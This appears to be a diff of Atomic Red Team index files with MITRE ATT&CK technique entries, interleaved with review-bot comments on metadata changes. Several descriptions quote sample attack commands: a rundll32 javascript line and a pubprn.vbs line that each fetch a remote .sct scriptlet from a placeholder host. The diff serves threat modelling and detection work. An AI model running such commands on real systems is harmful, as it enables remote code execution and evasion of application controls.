- - Google Workspace
- - Office 365
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Cloud Storage: Cloud Storage Modification'
- 'Snapshot: Snapshot Creation'
@@ -61076,7 +61943,6 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1052:
technique:
@@ -61098,7 +61964,7 @@ exfiltration:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1052
external_id: T1052
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:48:29.702Z'
name: Exfiltration Over Physical Medium
description: Adversaries may attempt to exfiltrate data via a physical medium,
such as a removable drive. In certain circumstances, such as an air-gapped
@@ -61122,12 +61988,10 @@ exfiltration:
x_mitre_system_requirements:
- Presence of physical medium or device
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1048.003:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-12T23:39:25.476Z'
name: 'Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated
Non-C2 Protocol'
description: "Adversaries may steal data by exfiltrating it over an un-encrypted
@@ -61191,6 +62055,5 @@ exfiltration:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1048.003
atomic_tests: []
diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml
index 75fa85ca80..921ed68f45 100644
--- a/atomics/Indexes/windows-index.yaml
+++ b/atomics/Indexes/windows-index.yaml
@@ -45,7 +45,7 @@ defense-evasion:
description: Microsoft. (n.d.). SendNotifyMessage function. Retrieved December
16, 2017.
source_name: Microsoft SendNotifyMessage function
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2020-11-10T18:29:31.004Z'
name: 'Process Injection: Extra Window Memory Injection'
description: "Adversaries may inject malicious code into process via Extra Window
Memory (EWM) in order to evade process-based defenses as well as possibly
@@ -97,8 +97,6 @@ defense-evasion:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1055.011
atomic_tests:
- name: Process Injection via Extra Window Memory (EWM) x64 executable
@@ -137,7 +135,7 @@ defense-evasion:
elevation_required: false
T1205.002:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-20T19:56:18.579Z'
name: Socket Filters
description: |-
Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell.
@@ -200,21 +198,27 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1027.011:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-10-04T15:05:25.388Z'
name: Fileless Storage
description: "Adversaries may store data in \"fileless\" formats to conceal
malicious activity from defenses. Fileless storage can be broadly defined
as any format other than a file. Common examples of non-volatile fileless
- storage include the Windows Registry, event logs, or WMI repository.(Citation:
- Microsoft Fileless)(Citation: SecureList Fileless)\n\nSimilar to fileless
- in-memory behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
+ storage in Windows systems include the Windows Registry, event logs, or WMI
+ repository.(Citation: Microsoft Fileless)(Citation: SecureList Fileless) In
+ Linux systems, shared memory directories such as `/dev/shm`, `/run/shm`, `/var/run`,
+ and `/var/lock` may also be considered fileless storage, as files written
+ to these directories are mapped directly to RAM and not stored on the disk.(Citation:
+ Elastic Binary Executed from Shared Memory Directory)(Citation: Akami Frog4Shell
+ 2024)(Citation: Aquasec Muhstik Malware 2024)\n\nSimilar to fileless in-memory
+ behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620)
and [Process Injection](https://attack.mitre.org/techniques/T1055), fileless
data storage may remain undetected by anti-virus and other endpoint security
- tools that can only access specific file formats from disk storage.\n\nAdversaries
+ tools that can only access specific file formats from disk storage. Leveraging
+ fileless storage may also allow adversaries to bypass the protections offered
+ by read-only file systems in Linux.(Citation: Sysdig Fileless Malware 23022)\n\nAdversaries
may use fileless storage to conceal various types of stored data, including
payloads/shellcode (potentially being used as part of [Persistence](https://attack.mitre.org/tactics/TA0003))
and collected data not yet exfiltrated from the victim (e.g., [Local Data
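Review bot: the expanded Fileless Storage description now cites `Akami Frog4Shell 2024` and `Sysdig Fileless Malware 23022`; both spellings (`Akami` for Akamai, `23022` for 2022) come from the upstream ATT&CK data and are matched verbatim by the `external_references` entries added in later hunks, so they resolve correctly. Leave them unchanged in this index: correcting one side here would break citation lookup, and the fix belongs upstream.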
@@ -234,6 +238,7 @@ defense-evasion:
- Mark Wee
- Simona David
- Xavier Rousseau
+ - Vito Alfano, Group-IB
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -241,10 +246,12 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.0'
+ - Linux
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Creation'
- 'WMI: WMI Creation'
+ - 'Process: Process Creation'
type: attack-pattern
id: attack-pattern--02c5abff-30bf-4703-ab92-1f6072fae939
created: '2023-03-23T19:55:25.546Z'
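Review bot: `Linux` is added to `x_mitre_platforms` for T1027.011 (with the 1.0 to 2.0 version bump) and `'Process: Process Creation'` to its data sources; since this file is `windows-index.yaml`, the technique presumably now also belongs in the Linux index. Please confirm the Linux index (and any combined index) was regenerated in the same run so the platform lists stay consistent across index files.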
@@ -254,6 +261,14 @@ defense-evasion:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1027/011
external_id: T1027.011
+ - source_name: Aquasec Muhstik Malware 2024
+ description: " Nitzan Yaakov. (2024, June 4). Muhstik Malware Targets Message
+ Queuing Services Applications. Retrieved September 24, 2024."
+ url: https://www.aquasec.com/blog/muhstik-malware-targets-message-queuing-services-applications/
+ - source_name: Elastic Binary Executed from Shared Memory Directory
+ description: Elastic. (n.d.). Binary Executed from Shared Memory Directory.
+ Retrieved September 24, 2024.
+ url: https://www.elastic.co/guide/en/security/7.17/prebuilt-rule-7-16-3-binary-executed-from-shared-memory-directory.html
- source_name: SecureList Fileless
description: Legezo, D. (2022, May 4). A new secret stash for “fileless” malware.
Retrieved March 23, 2023.
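Review bot: the description for `Aquasec Muhstik Malware 2024` is emitted as a double-quoted scalar with a leading space (`" Nitzan Yaakov. ...`), unlike the neighbouring entries; that is the upstream string carried through faithfully, so no change is needed here, but it is worth reporting upstream rather than trimming in the index.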
@@ -262,15 +277,22 @@ defense-evasion:
description: Microsoft. (2023, February 6). Fileless threats. Retrieved March
23, 2023.
url: https://learn.microsoft.com/microsoft-365/security/intelligence/fileless-threats
+ - source_name: Sysdig Fileless Malware 23022
+ description: Nicholas Lang. (2022, May 3). Fileless malware mitigation. Retrieved
+ September 24, 2024.
+ url: https://sysdig.com/blog/containers-read-only-fileless-malware/
+ - source_name: Akami Frog4Shell 2024
+ description: Ori David. (2024, February 1). Frog4Shell — FritzFrog Botnet
+ Adds One-Days to Its Arsenal. Retrieved September 24, 2024.
+ url: https://www.akamai.com/blog/security-research/fritzfrog-botnet-new-capabilities-log4shell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1218.011:
technique:
- modified: '2023-08-14T15:35:28.965Z'
+ modified: '2024-10-14T13:14:43.083Z'
name: 'Signed Binary Proxy Execution: Rundll32'
description: "Adversaries may abuse rundll32.exe to proxy execution of malicious
code. Using rundll32.exe, vice executing directly (i.e. [Shared Modules](https://attack.mitre.org/techniques/T1129)),
@@ -281,10 +303,10 @@ defense-evasion:
also be used to execute [Control Panel](https://attack.mitre.org/techniques/T1218/002)
Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL
and Control_RunDLLAsUser
. Double-clicking a .cpl file also causes
- rundll32.exe to execute. (Citation: Trend Micro CPL)\n\nRundll32 can also
- be used to execute scripts such as JavaScript. This can be done using a syntax
- similar to this: rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication
- \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
+ rundll32.exe to execute.(Citation: Trend Micro CPL) For example, [ClickOnce](https://attack.mitre.org/techniques/T1127/002)
+ can be proxied through Rundll32.exe.\n\nRundll32 can also be used to execute
+ scripts such as JavaScript. This can be done using a syntax similar to this:
+ rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\"
\ This behavior has been seen used by malware such as Poweliks. (Citation:
This is Security Command Line Confusion)\n\nAdversaries may also attempt to
obscure malicious code from analysis by abusing the manner in which rundll32.exe
@@ -320,7 +342,7 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '2.2'
+ x_mitre_version: '2.3'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
@@ -350,7 +372,7 @@ defense-evasion:
- source_name: This is Security Command Line Confusion
description: B. Ancel. (2014, August 20). Poweliks – Command Line Confusion.
Retrieved March 5, 2018.
- url: https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/
+ url: https://www.stormshield.com/news/poweliks-command-line-confusion/
- source_name: Github NoRunDll
description: gtworek. (2019, December 17). NoRunDll. Retrieved August 23,
2021.
@@ -361,9 +383,8 @@ defense-evasion:
url: https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1218.011
atomic_tests:
- name: Rundll32 execute JavaScript Remote Payload With GetObject
@@ -840,49 +861,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
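Review bot: everything deleted at the top of this T1556.003 object (`x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref`, `external_references`) is re-emitted lower in the same object by the next hunk, so this is a key reorder plus the `modified` bump, not a data loss; the only ordering change with any visible effect is that `PAM Creds` now precedes `Red Hat PAM` in `external_references`, which is harmless as citations resolve by `source_name`. The context lines of the description (`pam_unix.so` / `, which retrieves` / `and /etc/shadow` split across lines) are pre-existing damage from stripped inline-code markup, not something this change introduces, but the generator should be fixed upstream so the paths stay in one sentence.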
@@ -897,20 +879,57 @@ defense-evasion:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
T1578.004:
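Review bot: `x_mitre_permissions_required: - root` is dropped with no replacement when T1556.003 moves to `x_mitre_attack_spec_version: 3.2.0`, while `x_mitre_deprecated: false` and `revoked: false` are added. That matches the newer ATT&CK object shape, but it removes the only field stating that PAM module or config modification needs root; anything in this repo that filters techniques by required privilege will silently stop matching. If that signal matters, it now has to live on the atomic tests themselves (this entry still has `atomic_tests: []`) via `elevation_required`, so note the field removal in the commit message.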
@@ -939,7 +958,7 @@ defense-evasion:
url: https://cloud.google.com/compute/docs/disks/restore-and-delete-snapshots
description: Google. (2019, October 7). Restoring and deleting persistent
disk snapshots. Retrieved October 8, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-03-08T10:33:02.128Z'
name: Revert Cloud Instance
description: |-
An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.
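Review bot: `modified` moves backwards here, from `2022-04-25T14:00:00.188Z` to `2021-03-08T10:33:02.128Z`, and the same regression shows up for a dozen other techniques in this diff (all of the old values share the `14:00:00.188Z` batch stamp, so the new values look like the real upstream timestamps replacing an earlier bulk re-stamp). Any consumer that caches on `modified` and only refreshes when it sees a later value will not pick these changes up; call this out in the commit message or bump a file-level generation marker alongside it.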
@@ -966,8 +985,6 @@ defense-evasion:
- 'Instance: Instance Modification'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1564.012:
technique:
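Review bot: both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` are removed from T1578.004, leaving the object with no attack-spec version at all, while neighbouring entries in this diff are bumped to `x_mitre_attack_spec_version: 3.2.0` instead. The object also keeps `x_mitre_permissions_required: - User`, a field the entries that were bumped to 3.2.0 (T1556.003 above) lose. Decide on one treatment for entries still at 2.1.0: either bump them to 3.2.0 with the matching field changes or keep the 2.1.0 marker so readers can tell which objects are on the old shape.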
@@ -1009,7 +1026,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1222.002:
technique:
@@ -1087,7 +1103,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1222.002
atomic_tests: []
T1216.001:
@@ -1124,7 +1139,7 @@ defense-evasion:
Adversaries may abuse PubPrn to execute malicious payloads hosted on remote sites.(Citation: Enigma0x3 PubPrn Bypass) To do so, adversaries may set the second script:
parameter to reference a scriptlet file (.sct) hosted on a remote site. An example command is pubprn.vbs 127.0.0.1 script:https://mydomain.com/folder/file.sct
. This behavior may bypass signature validation restrictions and application control solutions that do not account for abuse of this script.
In later versions of Windows (10+), PubPrn.vbs
has been updated to prevent proxying execution from a remote site. This is done by limiting the protocol specified in the second parameter to LDAP://
, vice the script:
moniker which could be used to reference remote code via HTTP(S).
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-18T14:55:35.817Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Signed Script Proxy Execution: Pubprn'
x_mitre_detection: Monitor script processes, such as `cscript`, and command-line
@@ -1143,7 +1158,6 @@ defense-evasion:
- Application Control
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1216.001
atomic_tests:
- name: PubPrn.vbs Signed Script Bypass
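Review bot: `x_mitre_attack_spec_version: 2.1.0` is kept for T1216.001 here (only `spec_version` is dropped), whereas the T1578.004 and T1036.007 hunks in this same diff remove the 2.1.0 marker together with `spec_version`. Same inconsistency as noted on T1578.004; whichever rule is chosen, apply it to all four places (T1216.001, T1578.004, T1036.007, Mavinject) so a later script can rely on the presence or absence of the field.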
@@ -1252,7 +1266,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1006:
technique:
@@ -1310,7 +1323,6 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1006
atomic_tests:
- name: Read volume boot sector via DOS device path (PowerShell)
@@ -1341,9 +1353,85 @@ defense-evasion:
Format-Hex -InputObject $buffer
name: powershell
elevation_required: true
+ T1666:
+ technique:
+ modified: '2024-09-25T16:15:41.224Z'
+ name: Modify Cloud Resource Hierarchy
+ description: "Adversaries may attempt to modify hierarchical structures in infrastructure-as-a-service
+ (IaaS) environments in order to evade defenses. \n\nIaaS environments often
+ group resources into a hierarchy, enabling improved resource management and
+ application of policies to relevant groups. Hierarchical structures differ
+ among cloud providers. For example, in AWS environments, multiple accounts
+ can be grouped under a single organization, while in Azure environments, multiple
+ subscriptions can be grouped under a single management group.(Citation: AWS
+ Organizations)(Citation: Microsoft Azure Resources)\n\nAdversaries may add,
+ delete, or otherwise modify resource groups within an IaaS hierarchy. For
+ example, in Azure environments, an adversary who has gained access to a Global
+ Administrator account may create new subscriptions in which to deploy resources.
+ They may also engage in subscription hijacking by transferring an existing
+ pay-as-you-go subscription from a victim tenant to an adversary-controlled
+ tenant. This will allow the adversary to use the victim’s compute resources
+ without generating logs on the victim tenant.(Citation: Microsoft Peach Sandstorm
+ 2023)(Citation: Microsoft Subscription Hijacking 2022)\n\nIn AWS environments,
+ adversaries with appropriate permissions in a given account may call the `LeaveOrganization`
+ API, causing the account to be severed from the AWS Organization to which
+ it was tied and removing any Service Control Policies, guardrails, or restrictions
+ imposed upon it by its former Organization. Alternatively, adversaries may
+ call the `CreateAccount` API in order to create a new account within an AWS
+ Organization. This account will use the same payment methods registered to
+ the payment account but may not be subject to existing detections or Service
+ Control Policies.(Citation: AWS RE:Inforce Threat Detection 2024)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: defense-evasion
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ type: attack-pattern
+ id: attack-pattern--0ce73446-8722-4086-9d43-514f1d0f669e
+ created: '2024-09-25T14:16:19.234Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1666
+ external_id: T1666
+ - source_name: AWS Organizations
+ description: AWS. (n.d.). Terminology and concepts for AWS Organizations.
+ Retrieved September 25, 2024.
+ url: https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html
+ - source_name: AWS RE:Inforce Threat Detection 2024
+ description: Ben Fletcher and Steve de Vera. (2024, June). New tactics and
+ techniques for proactive threat detection. Retrieved September 25, 2024.
+ url: https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf
+ - source_name: Microsoft Subscription Hijacking 2022
+ description: Dor Edry. (2022, August 24). Hunt for compromised Azure subscriptions
+ using Microsoft Defender for Cloud Apps. Retrieved September 5, 2023.
+ url: https://techcommunity.microsoft.com/t5/microsoft-365-defender-blog/hunt-for-compromised-azure-subscriptions-using-microsoft/ba-p/3607121
+ - source_name: Microsoft Azure Resources
+ description: Microsoft Azure. (2024, May 31). Organize your Azure resources
+ effectively. Retrieved September 25, 2024.
+ url: https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-setup-guide/organize-resources
+ - source_name: Microsoft Peach Sandstorm 2023
+ description: Microsoft Threat Intelligence. (2023, September 14). Peach Sandstorm
+ password spray campaigns enable intelligence collection at high-value targets.
+ Retrieved September 18, 2023.
+ url: https://www.microsoft.com/en-us/security/blog/2023/09/14/peach-sandstorm-password-spray-campaigns-enable-intelligence-collection-at-high-value-targets/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
T1564.008:
technique:
- modified: '2023-10-16T16:41:53.957Z'
+ modified: '2024-10-15T15:56:27.592Z'
name: 'Hide Artifacts: Email Hiding Rules'
description: |-
Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule
or Set-InboxRule
[PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
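Review bot: the new T1666 object ships with `x_mitre_detection: ''` and a single data source (`Cloud Service: Cloud Service Modification`) even though the description names the concrete control-plane actions to watch (`LeaveOrganization`, `CreateAccount`, subscription transfer between tenants). If this YAML is regenerated verbatim from the upstream STIX bundle the empty string is upstream's and should stay as is; if the file is hand-maintained, the detection text is the one field worth filling before merge, since `atomic_tests: []` means there is nothing else here that exercises the technique. Also note this hunk silently carries the `modified` bump for the following T1564.008 object; keep that in mind when reading the T1666 addition as a self-contained change.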
@@ -1369,11 +1457,10 @@ defense-evasion:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Application Log: Application Log Content'
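Review bot: replacing `Office 365` and `Google Workspace` with the single `Office Suite` platform changes what any per-platform index generator sees for T1564.008. This same change edits `google-workspace-index.csv` by hand, so check how that index is derived from `x_mitre_platforms`: unless the generator maps `Office Suite` back to both Office 365 and Google Workspace, T1564.008 will drop out of the Google Workspace view while the rule-based inbox-hiding behaviour it describes still applies there. The `x_mitre_version` bump to `1.4` is consistent with a platform-only change.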
@@ -1418,12 +1505,11 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1564.008
atomic_tests: []
T1027.013:
technique:
- modified: '2024-04-19T04:03:07.164Z'
+ modified: '2024-10-15T16:32:45.108Z'
name: Encrypted/Encoded File
description: "Adversaries may encrypt or encode files to obfuscate strings,
bytes, and other specific patterns to impede detection. Encrypting and/or
@@ -1494,11 +1580,10 @@ defense-evasion:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1014:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:50.568Z'
name: Rootkit
description: "Adversaries may use rootkits to hide the presence of programs,
files, network connections, services, drivers, and other system components.
@@ -1566,7 +1651,6 @@ defense-evasion:
url: https://en.wikipedia.org/wiki/Rootkit
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1014
atomic_tests: []
T1036.007:
@@ -1597,7 +1681,7 @@ defense-evasion:
url: https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/
description: Seqrite. (n.d.). How to avoid dual attack and vulnerable files
with double extension?. Retrieved July 27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-14T21:09:59.588Z'
name: 'Masquerading: Double File Extension'
description: "Adversaries may abuse a double extension in the filename as a
means of masquerading the true file type. A file name may include a secondary
@@ -1634,8 +1718,6 @@ defense-evasion:
x_mitre_data_sources:
- 'File: File Creation'
- 'File: File Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1036.007
atomic_tests:
- name: File Extension Masquerading
@@ -1713,7 +1795,7 @@ defense-evasion:
name: command_prompt
T1548.002:
technique:
